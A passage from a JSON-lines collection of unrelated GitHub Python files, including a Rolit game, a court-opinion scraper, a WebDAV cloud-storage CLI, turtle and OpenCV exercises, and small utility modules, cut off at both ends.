Main file responsible for the game organisation\n\"\"\"\n\nimport sys\nfrom time import sleep\nfrom itertools import product\nimport pygame\n\nfrom rolit_game.ui import UI\nfrom rolit_game.popup import Popup\nfrom rolit_game.settings import Settings\nfrom rolit_game.helpers import test_cell_existence, exist_adjacent_cell\nfrom rolit_game.strategies import AI_Strategy, RandomlyPlayStrategy, MiniMaxStrategy\n\nclass Game:\n \"\"\"Main manager for the game\n \"\"\"\n def __init__(self, board_size: int, gamemode: str, ai_level: str):\n self.board_size = board_size\n self.gamemode = gamemode\n self.ai_level = ai_level\n self.ui = UI(self.board_size)\n\n self.board = []\n self.PLAYER1 = Settings.PLAYER1\n self.score1 = 0\n self.PLAYER2 = Settings.PLAYER2\n self.score2 = 0\n self.dead_cell_value = Settings.DEAD_CELL\n\n self.turn = self.PLAYER1\n self.beginner = self.PLAYER1\n\n self.ai_strategy: AI_Strategy\n\n # Time intervall between two actions (making the AI pause between two moves)\n self.SLEEP_TIME = 0.3\n\n self.config()\n\n def play(self):\n \"\"\"Main function of the game\n \"\"\"\n while not self.end_game:\n if self.gamemode == \"AI-AI\":\n sleep(self.SLEEP_TIME)\n cell_pos = self.ai_play()\n if not self.place_coin(cell_pos):\n print('The AI return a non valid cell')\n self.check_changing_colors(cell_pos)\n self.ui.update_diplay(self.board, self.scores)\n self.switch_turn()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n else:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP:\n cell_pos = self.ui.get_nearest_cell()\n # While he/she didn't play in a valid empty cell\n if not self.place_coin(cell_pos):\n break\n self.check_changing_colors(cell_pos)\n self.ui.update_diplay(self.board, self.scores)\n self.switch_turn()\n\n if self.gamemode != \"Player-Player\" and not self.end_game:\n sleep(self.SLEEP_TIME)\n cell_pos = self.ai_play()\n if not self.place_coin(cell_pos):\n print('The AI return a non valid cell')\n self.check_changing_colors(cell_pos)\n self.ui.update_diplay(self.board, self.scores)\n\n self.switch_turn()\n if event.type == pygame.QUIT:\n sys.exit()\n\n self.score1, self.score2 = self.scores\n sleep(self.SLEEP_TIME)\n\n need_to_save_score = self.gamemode == \"Player-AI\" and self.board_size == 5\n play_again = Popup.display_score(self.score1, self.score2, self.ai_level, need_to_save_score)\n\n # If the player want to play again\n if play_again:\n # Initialize the new game with the old configuration\n self.config()\n\n # If its a game with AI -> The beginner of the game change,\n # The AI play one turn and the play function is called\n if self.gamemode != \"Player-Player\":\n if self.beginner == self.PLAYER1:\n self.beginner = self.PLAYER2\n #back to green\n self.switch_turn()\n self.place_coin(self.ai_play())\n self.check_changing_colors(cell_pos)\n #back to red\n self.switch_turn()\n else:\n self.beginner = self.PLAYER1\n #Back to red\n self.switch_turn()\n\n self.play()\n\n def config(self):\n \"\"\"Load the default board and display it\n \"\"\"\n # Reseting values\n self.board.clear()\n self._init_board_lists()\n\n # Placing some dark coins to allow the game to be fair\n self._place_dead_cells(self.turn)\n self.ui.update_ui()\n\n self.score1 = 0\n self.score2 = 0\n\n if self.gamemode != \"Player-Player\":\n self.ai_strategy = self.get_ai_strategy(self.ai_level, self.PLAYER2, self.PLAYER1)\n if self.gamemode == \"AI-AI\":\n strat2 = self.get_ai_strategy(self.ai_level, self.PLAYER1, self.PLAYER2)\n self.ai_strategy = (strat2, self.ai_strategy)\n print(self.ai_strategy)\n\n @classmethod\n def get_ai_strategy(cls, ai_level: str, player: int, opponent: int):\n \"\"\"Get specific strategy following the given level\"\"\"\n if ai_level == \"Easy\":\n return RandomlyPlayStrategy()\n return MiniMaxStrategy(ai_level, player, opponent)\n\n def _init_board_lists(self):\n \"\"\"Fill the board with zeros\n \"\"\"\n for i in range(self.board_size):\n self.board.append([])\n [self.board[i].append(0) for y in range(self.board_size)]\n\n def _place_dead_cells(self, old_turn: int):\n \"\"\"Place a black cell which allow the game to be fair\n \"\"\"\n self.turn = self.dead_cell_value\n list_dead_cells = [(2, 2)] if self.board_size == 5 else [(4, 4), (3, 3)]\n for pos in list_dead_cells:\n cell_pos = self.ui.pos_from_cell_index(pos)\n self.place_coin(cell_pos, True)\n self.turn = old_turn\n\n def place_coin(self, cell_pos: tuple, first_cells=None) -> bool:\n \"\"\"Place a coin in a valid cell\n \"\"\"\n if first_cells is None:\n first_cells = False\n i, j = self.ui.cell_index_from_pos(cell_pos)\n if first_cells or exist_adjacent_cell(self.board, (i, j)):\n if self.board[i][j] == 0:\n if self.turn == self.PLAYER1:\n self.ui.add_coin_img(self.ui.red_coin, cell_pos)\n self.board[i][j] = self.turn\n elif self.turn == self.PLAYER2:\n self.ui.add_coin_img(self.ui.green_coin, cell_pos)\n self.board[i][j] = self.turn\n else:\n self.ui.add_coin_img(self.ui.dead_cell, cell_pos)\n self.board[i][j] = self.dead_cell_value\n # print('Cell placed - Coords : {} , {} by {}'.format(i,j,self.turn))\n return True\n # TODO : Add specific error ?\n print('Cell already full {} - Coords : {} , {}'.format(self.turn, i, j))\n if self.gamemode == \"Player-Player\":\n Popup.place_near_coin()\n return False\n\n def ai_play(self) -> tuple:\n \"\"\" Play randomly on an empty cell near an other coin\n \"\"\"\n if self.gamemode == \"AI-AI\":\n # Considering player1 = 1 and player2 = 2\n cell_index = self.ai_strategy[self.turn-1].play(self.board)\n else:\n cell_index = self.ai_strategy.play(self.board)\n inversed_cell_pos = self.ui.pos_from_cell_index(cell_index)\n cell_pos = (inversed_cell_pos[1], inversed_cell_pos[0])\n\n return cell_pos\n\n def check_changing_colors(self, cell_pos: tuple):\n \"\"\"Roll all coins wich need to change since the last move\n \"\"\"\n index_initial_cell_filled = self.ui.cell_index_from_pos(cell_pos)\n\n # get the eight coordinates to add from (-1,-1) to (1,1)\n possible_line_directions = list(filter(lambda x: x[0] != 0 or x[1] != 0, list(product(range(-1, 2), range(-1, 2)))))\n\n for coord_couple in possible_line_directions:\n stack = []\n roll_needed = False\n while True:\n # Each tme we check line by line if each cell is empty or\n # full with the same color of the coin placed\n i = index_initial_cell_filled[0] + coord_couple[0]*(len(stack) + 1)\n j = index_initial_cell_filled[1] + coord_couple[1]*(len(stack) + 1)\n\n #If the cell doesn't exist or if it's empty we stop searching on the specific line\n if not test_cell_existence(self.board, i, j) or self.board[i][j] == 0:\n break\n\n #If the cell is fill with a coin with the same color of the placed one we stop searching\n #(Following to the rules no other cells need to be rolled on the line)\n if self.board[i][j] == self.turn:\n roll_needed = True\n break\n\n stack.append((i, j))\n\n if roll_needed:\n sleep(self.SLEEP_TIME)\n [self.roll(index) for index in stack]\n\n def switch_turn(self):\n \"\"\"Let the other player play\n \"\"\"\n self.turn = self.PLAYER1 if self.turn == self.PLAYER2 else self.PLAYER2\n\n @property\n def scores(self) -> tuple:\n \"\"\"Get the score of each player\n \"\"\"\n return (\n sum([line.count(self.PLAYER1) for line in self.board]),\n sum([line.count(self.PLAYER2) for line in self.board])\n )\n\n @property\n def end_game(self) -> bool:\n \"\"\" Define whether a game is ended or not\n By returning if all the numbers are equal to 0\n \"\"\"\n return all((all(row) for row in self.board))\n\n def roll(self, cell_index: tuple):\n \"\"\"Roll a cell to the color of the other player\n \"\"\"\n i, j = cell_index\n cell_pos = self.ui.pos_from_cell_index((j, i))\n\n #Place the correspoding colored coin\n self.ui.add_coin_img(self.ui.red_coin, cell_pos) \\\n if self.turn == self.PLAYER1 else self.ui.add_coin_img(self.ui.green_coin, cell_pos)\n self.board[cell_index[0]][cell_index[1]] = self.turn\n sleep(self.SLEEP_TIME)\n","repo_name":"s-rigaud/Rolit","sub_path":"rolit_game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26083344135","text":"import random\r\nrock = ('''\r\n _______\r\n---' ____)\r\n (_____)\r\n (_____)\r\n (____)\r\n---.__(___)\r\n''')\r\n\r\npaper = ('''\r\n _______\r\n---' ____)____\r\n ______)\r\n _______)\r\n _______)\r\n---.__________)\r\n''')\r\n\r\nscissors = ('''\r\n _______\r\n---' ____)____\r\n ______)\r\n __________)\r\n (____)\r\n---.__(___)\r\n''')\r\nuser = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\\n\"))\r\n\r\nif (user==0):\r\n print(rock)\r\nelif (user==1):\r\n print(paper)\r\nelif (user==2):\r\n print(scissors)\r\n\r\n \r\n\r\ncomputer = random.randint(0,2)\r\nprint(\"Computer choose\")\r\nif (computer==0):\r\n print(rock)\r\nelif (computer==1):\r\n print(paper)\r\nelif (computer==2):\r\n print(scissors)\r\n \r\nif user>=3 or user<0:\r\n print(\"You chose an invalid number!!\")\r\nelif user==0 and computer ==2:\r\n print(\"You win!!\")\r\nelif computer==0 and user==2:\r\n print(\"You lose\")\r\nelif computer>user:\r\n print(\"You lose\")\r\nelif user>computer:\r\n print(\"You win!!\")\r\nelif computer==user:\r\n print(\"It's a draw\")\r\n \r\n \r\n\r\n \r\n \r\n\r\n","repo_name":"shivani8305/python-pro","sub_path":"Python pro/py4.py","file_name":"py4.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17857864829","text":"# Scraper for Iowa Supreme Court\r\n# CourtID: iowa\r\n# Court Short Name: iowa\r\n# Author: Andrei Chelaru\r\n# Reviewer: mlr\r\n# Date created: 25 July 2014\r\n\r\n\r\nfrom datetime import date\r\nimport time\r\nfrom lxml import html\r\nimport requests\r\nimport re\r\n\r\nfrom juriscraper.OpinionSite import OpinionSite\r\nfrom juriscraper.lib.string_utils import titlecase\r\n\r\n\r\nclass Site(OpinionSite):\r\n def __init__(self):\r\n super(Site, self).__init__()\r\n self.court_id = self.__module__\r\n self.year = date.today().year\r\n self.url = 'http://www.iowacourts.gov/About_the_Courts/Supreme_Court/Supreme_Court_Opinions/Opinions_Archive/index.asp'\r\n\r\n def _download(self, request_dict={}):\r\n if self.method == 'LOCAL':\r\n # Note that this is returning a list of HTML trees.\r\n html_trees = [super(Site, self)._download(request_dict=request_dict)]\r\n else:\r\n html_l = OpinionSite._download(self)\r\n s = requests.session()\r\n html_trees = []\r\n for url in html_l.xpath(\"//td[@width='49%']//tr[contains(., ', {year}')]/td[5]/a/@href\".format(year=self.year)):\r\n r = s.get(url,\r\n headers={'User-Agent': 'Juriscraper'},\r\n **request_dict)\r\n r.raise_for_status()\r\n\r\n # If the encoding is iso-8859-1, switch it to cp1252 (a\r\n # superset)\r\n if r.encoding == 'ISO-8859-1':\r\n r.encoding = 'cp1252'\r\n\r\n # Grab the content\r\n text = self._clean_text(r.text)\r\n html_tree = html.fromstring(text)\r\n html_tree.make_links_absolute(self.url)\r\n\r\n remove_anchors = lambda url: url.split('#')[0]\r\n html_tree.rewrite_links(remove_anchors)\r\n html_trees.append(html_tree)\r\n return html_trees\r\n\r\n def _get_case_names(self):\r\n case_names = []\r\n for html_tree in self.html:\r\n case_names.extend(self._return_case_names(html_tree))\r\n return case_names\r\n\r\n @staticmethod\r\n def _return_case_names(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfLabel')]/text()\"\r\n return [titlecase(s.strip().lower()) for s in html_tree.xpath(path)]\r\n\r\n def _get_download_urls(self):\r\n download_urls = []\r\n for html_tree in self.html:\r\n download_urls.extend(self._return_download_urls(html_tree))\r\n return download_urls\r\n\r\n @staticmethod\r\n def _return_download_urls(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfLabel')]/preceding::tr[2]/td[1]/a/@href\"\r\n return list(html_tree.xpath(path))\r\n\r\n def _get_case_dates(self):\r\n case_dates = []\r\n for html_tree in self.html:\r\n case_dates.extend(self._return_dates(html_tree))\r\n return case_dates\r\n\r\n @staticmethod\r\n def _return_dates(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfHeader') and not(contains(., 'Iowa'))]/text()\"\r\n dates = []\r\n text = html_tree.xpath(path)[0]\r\n case_date = date.fromtimestamp(time.mktime(time.strptime(text.strip(), '%B %d, %Y')))\r\n dates.extend([case_date] * int(html_tree.xpath(\"count(//*[contains(concat(' ',@id,' '),' wfLabel')])\")))\r\n return dates\r\n\r\n def _get_precedential_statuses(self):\r\n return ['Published'] * len(self.case_dates)\r\n\r\n def _get_docket_numbers(self):\r\n docket_numbers = []\r\n for html_tree in self.html:\r\n docket_numbers.extend(self._return_docket_numbers(html_tree))\r\n return docket_numbers\r\n\r\n @staticmethod\r\n def _return_docket_numbers(html_tree):\r\n path = \"//*[contains(concat(' ',@id,' '),' wfLabel')]/preceding::tr[2]/td[1]/a/text()\"\r\n return [re.sub('Nos?.', '', e).strip() for e in html_tree.xpath(path)]\r\n","repo_name":"brianwc/juriscraper","sub_path":"opinions/united_states/state/iowa.py","file_name":"iowa.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"25413649659","text":"\"\"\"\nGiven a cell with \"it's a fib sequence\" from slideshow,\n please write function \"check_fib\",\n which accepts a Sequence of integers, and\n returns if the given sequence is a Fibonacci sequence\nWe guarantee, that the given sequence contain >= 0 integers inside.\n\"\"\"\nfrom collections.abc import Sequence\nfrom math import sqrt\n\n\ndef check_fibonacci1(data: Sequence[int]) -> bool:\n \"\"\"\n normal way to check fib sequence\n \"\"\"\n res = True\n num_1 = 0\n num_2 = 1\n while data[0] > num_1:\n num_1, num_2 = num_2, num_1 + num_2\n for i, item in enumerate(data):\n if item != num_1:\n res = False\n break\n num_1, num_2 = num_2, num_1 + num_2\n\n return res\n\n\ndef _binet_formula(n: int) -> int:\n return int((((1 + sqrt(5)) / 2) ** n - ((1 - sqrt(5)) / 2) ** n) / sqrt(5))\n\n\ndef check_fibonacci2(data: Sequence[int]) -> bool:\n \"\"\"\n I was curious if this works\n \"\"\"\n res = True\n for i, item in enumerate(data):\n if item != int(_binet_formula(i)):\n res = False\n break\n return res\n","repo_name":"adlerberg0/EPAM-training","sub_path":"hw1/task2/check_fib.py","file_name":"check_fib.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38506867037","text":"i=0\r\nwhile i<5:\r\n print(i+1)\r\n i = i+1\r\n\r\nj=0\r\nwhile j<5:\r\n print(\"Arjun singh\")\r\n j=j+1\r\n\r\nk=5\r\nwhile k>=0:\r\n print(k)\r\n k = k-1\r\nelse:\r\n print(\"I am inside else\")\r\n \r\n\r\n","repo_name":"ArjunSinghShekhawat/Python","sub_path":"whileLoop.py","file_name":"whileLoop.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31256023065","text":"import argparse\nimport os\nfrom OXFORD import OXFORDMaker\n\n\nparser = argparse.ArgumentParser(description='Make dataset TFRecord file')\nparser.add_argument('--img_dir', type=str, required=True,\n help='jpg images directory path')\nparser.add_argument('--label_dir', type=str, required=True,\n help='png labels directory path')\nparser.add_argument('--train_txt', type=str, required=True,\n help='train.txt file path')\nparser.add_argument('--val_txt', type=str, required=True,\n help='val.txt file path')\nparser.add_argument('--shuffle', type=bool, default=False)\nparser.add_argument('--save_dir', type=str, default='./tfrecords/', help='the directory path to saved tfrecord')\n\nargs = parser.parse_args()\n\n\nif __name__ == '__main__':\n maker = OXFORDMaker(args.img_dir, args.label_dir, args.train_txt, args.val_txt, args.shuffle)\n\n # train dataset\n save_path = os.path.join(args.save_dir, 'train_OXFORD.tfrecord')\n maker.make_tfrecord(save_path, 'train')\n\n # val dataset\n save_path = os.path.join(args.save_dir, 'val_OXFORD.tfrecord')\n maker.make_tfrecord(save_path, 'val')\n","repo_name":"kwjinwoo/HRNet","sub_path":"segmentation/dataset/dataset_make.py","file_name":"dataset_make.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"378371253","text":"# encoding: utf-8\nimport re\nfrom collections import OrderedDict\nfrom os import path\nfrom itertools import ifilter\nfrom urllib import unquote\n\nimport click\nimport tabulate\nfrom dateutil.parser import parse as dt_parse\nfrom dateutil import tz\nfrom parsimonious import ParseError\nfrom parsimonious.grammar import Grammar\nfrom parsimonious.nodes import NodeVisitor\n\nfrom nutstore_cli.utils import output, humanbytes, to_str\nfrom nutstore_cli.command_help import help_table\nfrom nutstore_cli.client.exceptions import WebdavException\n\nCOMMANDS = ['cd', 'download', 'exit', 'grep', 'help', 'ls', 'll', 'rm', 'upload']\n\nRULES = r\"\"\"\n command = cd / ls / exit / help / download / upload / rm\n\n rm = \"rm\" _ string\n upload = \"upload\" _ string\n download = \"download\" _ string _ (string)?\n help = \"help\" / \"h\" / \"?\"\n exit = \"exit\" / \"quit\" / \"q\"\n ls = (\"ls\" / \"ll\") _ (grep)?\n cd = _ \"cd\" _ string _\n \n grep = pipe _ \"grep\" _ ex_string\n \n pipe = \"|\"\n\n ex_string = string / \"*\" / \"-\" / \"_\" / \".\"\n string = char+\n char = ~r\"[^\\s'\\\\]\"\n _ = ~r\"\\s*\"\n\"\"\"\n\ngrammar = Grammar(RULES)\n\n\nclass PrettyFile(object):\n def __init__(self, efile):\n \"\"\"\n :type efile: easywebdav.client.File\n \"\"\"\n self._file = efile\n self._name = unquote(path.basename(efile.name)).decode('utf-8')\n\n self.is_dir = efile.contenttype == 'httpd/unix-directory'\n self.name = self._name\n self.size = humanbytes(int(efile.size))\n self.modify_time = dt_parse(efile.mtime).astimezone(tz.tzlocal()).strftime('%Y-%m-%d %H:%M:%S')\n if self.is_dir:\n self.name = click.style(self._name, fg='cyan')\n self.size = ''\n\n def pack(self):\n return self.name, self.size, self.modify_time\n\n\nclass ExecutionVisitor(NodeVisitor):\n unwrapped_exceptions = (WebdavException,)\n\n def __init__(self, context):\n \"\"\"\n :type context: nutstore_cli.cli.Context\n \"\"\"\n super(ExecutionVisitor, self).__init__()\n self.context = context\n\n def visit_cd(self, node, children):\n path = children[3].text\n self.context.client.cd(to_str(path))\n\n def visit_exit(self, node, children):\n self.context.should_exit = True\n\n def visit_ls(self, node, children):\n pretty_files = [PrettyFile(ef) for ef in self.context.client.ls()]\n grep_keywords = children[2].children[4].children[0].text if children[2].children else None\n if grep_keywords:\n output.debug('Issue a grep \"{}\"'.format(grep_keywords))\n pretty_files = ifilter(lambda pfile: re.search(grep_keywords, pfile._name, flags=re.IGNORECASE),\n pretty_files)\n pretty_files = ifilter(lambda pfile: bool(pfile._name), pretty_files) # ignore who has a empty filename\n pretty_files = sorted(pretty_files, key=lambda pfile: pfile.modify_time)\n output.echo(tabulate.tabulate(\n [pfile.pack() for pfile in pretty_files],\n headers=['Filename', 'Size', 'Modify Time']\n ))\n\n def visit_download(self, node, children):\n cloud_path = children[2].text\n store_path = children[4].text if len(node.children) == 5 else None\n dest = self.context.client.download(to_str(cloud_path), to_str(store_path))\n output.echo(dest)\n\n def visit_upload(self, node, children):\n local_path = to_str(children[2].text)\n remote_path = self.context.client.upload(local_path)\n output.echo(remote_path)\n\n def visit_rm(self, node, children):\n cloud_path = to_str(children[2].text)\n if click.confirm('rm {}?'.format(cloud_path)):\n self.context.client.rm(cloud_path)\n\n def visit_help(self, node, children):\n output.info(help_table)\n\n def generic_visit(self, node, children):\n if (not node.expr_name) and node.children:\n if len(children) == 1:\n return children[0]\n return children\n return node\n\n\ndef execute(command, context):\n if not command.strip():\n return\n\n visitor = ExecutionVisitor(context)\n try:\n root = grammar.parse(command)\n except ParseError:\n output.error('Invalid command \"{0}\".'.format(command))\n output.info('Type \"help\" to see supported commands.')\n return\n\n try:\n visitor.visit(root)\n except WebdavException as e:\n output.error(str(e))\n","repo_name":"Kxrr/nutstore-cli","sub_path":"nutstore_cli/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"47"} +{"seq_id":"17012507973","text":"## Bouncing Ball\r\n##\r\n## Just as printing \"Hello World\" is the standard first\r\n## example completed in a new programming language, games\r\n## packages are usually introduced with a \"Bouncing Ball\"\r\n## demonstration in which a ball bounces around\r\n## the screen. Turtle graphics is not designed for\r\n## creating games, but we can still produce a convincing\r\n## bouncing ball simulation.\r\n##\r\n## The incomplete program below creates a black window and\r\n## makes the cursor look like a beachball. (Make sure the\r\n## file 'beachball.gif' is in the same folder as this\r\n## program.)\r\n##\r\n## Your job is to make the ball bounce realistically around\r\n## the walls. Use the following strategy.\r\n##\r\n## 1. Set up the window size to a known value so that you\r\n## know the maximum x and y coordinates (i.e., where the\r\n## borders are)\r\n## 2. Lift the pen, because we don't want to leave a trail\r\n## 3. For each of a large range of \"bounces\":\r\n## a. Choose a random position on the top border\r\n## b. Move the cursor to that position\r\n## c. Choose a random position on the left border\r\n## d. Move the cursor to that position\r\n## e. Choose a random position on the bottom border\r\n## f. Move the cursor to that position\r\n## g. Choose a random position on the right border\r\n## h. Move the cursor to that position\r\n##\r\n## Experiment with different ways of choosing the random\r\n## positions to get the most realistic bouncing effect.\r\n## (We found that it's best to keep the ball away from\r\n## the corners.)\r\n\r\n# Import the functions required\r\nfrom turtle import *\r\nfrom random import randint\r\n\r\n# Set up the playing field\r\nsetup()\r\ntitle('Bouncing Ball')\r\nbgcolor('black')\r\n\r\n# Create the ball's image from a file\r\nregister_shape('beachball.gif')\r\nshape('beachball.gif') # make the turtle look like a ball\r\n\r\n# Set the drawing speed, if necessary\r\nspeed('slow')\r\n\r\n# Fix the window's size so that we know where the borders are\r\nmax_coord =300 # pixels\r\nsetup(max_coord * 2, max_coord * 2)\r\n\r\n# Lift the pen, so that we don't leave a trail\r\npenup()\r\n\r\n# Limit how far we can get from the middle of the wall\r\ndist_from_middle = max_coord / 2\r\n\r\n# Bounce off of each of the four walls multiple times,\r\n# keeping the ball away from the corners\r\nfor bounce_num in range(30):\r\n goto(randint(-dist_from_middle, dist_from_middle), max_coord) # Top border,\r\n goto(-max_coord, randint(-dist_from_middle, dist_from_middle)) # Left border\r\n goto(randint(-dist_from_middle, dist_from_middle), -max_coord) # Bottom border\r\n goto(max_coord, randint(-dist_from_middle, dist_from_middle)) # Right border\r\n\r\n# Comment: Turtle is mainly a drawing package, so its ability\r\n# to support games and simulations is limited. If you're keen\r\n# on these kinds of animations we suggest you look online for the\r\n# PyGame package which can be used to create \"real\" games in\r\n# Python.\r\n\r\n# Exit gracefully\r\ndone()\r\n\r\n \r\n","repo_name":"ARWA-ALraddadi/python-tutorial-for-beginners","sub_path":"02-Workshop/Workshop-Solutions/bouncing_ball.py","file_name":"bouncing_ball.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16091142622","text":"from tastypie.resources import ModelResource\nfrom exampleapp.models import Persons , State\nfrom tastypie.authorization import Authorization\nfrom tastypie import fields\n\nclass StateResource(ModelResource):\n class Meta:\n queryset=State.objects.all()\n resource_name = 'State'\n authorization= Authorization()\n always_return_data = True\n \nclass PersonResource(ModelResource):\n state = fields.ForeignKey(StateResource,'state')\n class Meta:\n queryset=Persons.objects.all()\n resource_name = 'Persons'\n authorization= Authorization()\n always_return_data = True","repo_name":"digitalgreenorg/nrlm","sub_path":"exampleapp/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35259033519","text":"from math import pi\n\nG = 6.67384e-8 # gravitational const / cm^3/g/s^2\nc = 2.99792458e10 # speed of light / cm/s\nhP = 6.6260688e-27 # Planck's const / erg s\nhbar = hP/2/pi\nkB = 1.3806488e-16 # Boltzmann const / erg/K\nmH = 1.66053892e-24 # atomic mass unit / g\nme = 9.1093898e-28 # electron mass / g\nalphaEM = 1/137.0359895 # fine structure constant\nsigmaT = 8*pi/3*(alphaEM*hbar/me/c)**2 # Thomson cross section / cm^2\na_rad = pi**2/15*kB*(kB/hbar/c)**3 # radiation const / erg/cm^3/K^4\nstefan = a_rad*c/4 # Stefan-Boltzmann const / erg/cm^2/s/K^4\neV = 1.60217733e-12 # 1 electron volt / erg\nkeV = 1e3*eV\nMsun = 1.98892e33 # solar mass / g\nLEsun = 4*pi*c*G*Msun*mH/sigmaT # Eddington luminosity / erg/s\nMEsun = LEsun/c**2\npc = 3.08567758e18 # 1 parsec / cm\n","repo_name":"tt-nakamura/BHAD","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"1065717362","text":"import os\n\n\ndef isnone(value, value2):\n \"\"\"Si la primera expresion distinta a None, retorna su valor,\n si es None, retorna el valor de la segunda expreson\n \"\"\"\n if value is None:\n return value2\n return value\n\n\ndef write_rs_to_csv(dict_var, file_name:str, append:bool):\n \"\"\"Escribe el contenido de una lista de Diccionarios a un archivo CSV\"\"\"\n\n if len(dict_var) == 0:\n return\n \n mode = 'w' if not append else 'a'\n \n if os.path.exists(file_name):\n if os.stat(file_name).st_size > 0:\n mode = 'a'\n append =True\n else:\n append = False\n mode = 'w'\n else:\n append = False\n mode = 'w'\n \n with open(file_name, mode, newline='') as f:\n w = csv.DictWriter(f, dict_var[0].keys(), delimiter=';')\n if not append:\n w.writeheader()\n \n for row in dict_var:\n w.writerow(row)\n\n\ndef write_list_to_file( lista, archivo):\n with open( archivo, 'w') as f:\n for item in lista:\n f.write(f'{item}\\n')\n\n\ndef menu(titulo: str, lista):\n \"\"\" Despliega un menú con los elementos de la lista entregada como parámetro.\n Se agrega el elemento \"Salir\" como último de la lista.\n Retorna:\n Indice de la lista que corresponde al elemento seleccionado\n -1 = Salir\n \"\"\"\n clear()\n if titulo != '':\n print(f'\\n{titulo}')\n else:\n print('\\n Menú\\n======')\n\n x: int = 0\n for elem in lista:\n print(f\"\\t{x+1:2} - {elem}\")\n x += 1\n print(f\"\\t{x+1:2} - Salir\")\n\n print(\"\")\n opcion_menu: int = 0\n while True:\n try:\n opcion_menu = int(input(\"Ingresa el número de tu Opción >> \"))\n\n if int(opcion_menu) >= 0 and int(opcion_menu) <= len(lista) + 1:\n break\n\n except ValueError:\n print(\"Ingrese sólo números\")\n\n if int(opcion_menu) == len(lista)+1:\n print(\"See you...\\n\")\n return -1\n else:\n return int(opcion_menu)-1\n\n\ndef menu2(titulo, prompt_salida, lista):\n \"\"\" Despliega un menú con los elementos de la lista entregada como parámetro.\n Se agrega el elemento \"Salir\" como último de la lista.\n Retorna:\n Indice de la lista que corresponde al elemento seleccionado\n -1 = Salir\n \"\"\"\n\n clear()\n if titulo != '':\n print(f'\\n{titulo}')\n else:\n print('\\n Menú\\n======')\n\n x: int = 0\n for elem in lista:\n print(f\"\\t{x+1:2} - {elem}\")\n x += 1\n print(f\"\\t{x+1:2} - {prompt_salida}\")\n \n print(\"\")\n opcion_menu: int = 0\n while True:\n try:\n opcion_menu = int(input(\"Ingresa el número de la Opción >> \"))\n\n if int(opcion_menu) >= 0 and int(opcion_menu) <= len(lista) + 1:\n break\n\n except ValueError:\n print(\"Ingrese sólo números\")\n\n if int(opcion_menu) == len(lista)+1:\n print(\"See you...\\n\")\n return -1\n else:\n return int(opcion_menu)-1\n\n\ndef clear():\n \"\"\"\n Limpiar pantalla de la consola\n \"\"\"\n if os.name == \"posix\":\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n","repo_name":"CristianSolervicens/DataBaseDictionary","sub_path":"modules/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9753868519","text":"import cv2\n\n\n# img\nimg_file = 'car_img.png'\n# video = cv2.VideoCapture('car_video.mp4')\n# video = cv2.VideoCapture('car_video2.mp4')\nvideo = cv2.VideoCapture('car_video4.mp4')\n\n# pre-trained car classifier\nclassifier_file = 'car_detector.xml'\n\ncar_tracker = cv2.CascadeClassifier(classifier_file)\n\n# Run forever until car stops or something\nwhile True:\n \n # Read the current frame\n (read_successful, frame) = video.read()\n\n if read_successful:\n \n # Must convert to grayscale\n grayscaled_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n else: \n break\n \n # detect cars\n cars = car_tracker.detectMultiScale(grayscaled_frame)\n \n # Draw rectangles around the cars\n for (x,y,w,h) in cars:\n cv2.rectangle(frame, ( x,y), (x+w, y+h), (0,0,255),2)\n\n \n # Display the image with the faces spotted\n cv2.imshow('car Detector', frame)\n \n # don't autoclose (Wait here in the code and listen for a key press)\n cv2.waitKey(1)\n\n# crete opencv image\nimg = cv2.imread(img_file)\n\n# convert to grayscale \nblack_n_white = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# track car classifier\ncar_tracker = cv2.CascadeClassifier(classifier_file)\n\n# detect cars => give coordinates\ncars = car_tracker.detectMultiScale(black_n_white)\n\n# Draw rectagles around the cars \nfor(x,y,w,h) in cars:\n cv2.rectangle(img, (x,y), (x+w, y+h), (0,0,255), 2)\n\n# Display the image with the faces stoptted\ncv2.imshow('programming', img)\n\n# don't autoclose ( wait here in the code and listen for a key press)\ncv2.waitKey()\n\nprint('code Completed')","repo_name":"yy-yoshioka/opencv_car_detection","sub_path":"Car_and_Pedestrian_Tracking.py","file_name":"Car_and_Pedestrian_Tracking.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11253489803","text":"# mpgReadFromFile.py\n# A program that computes the fuel efficiency 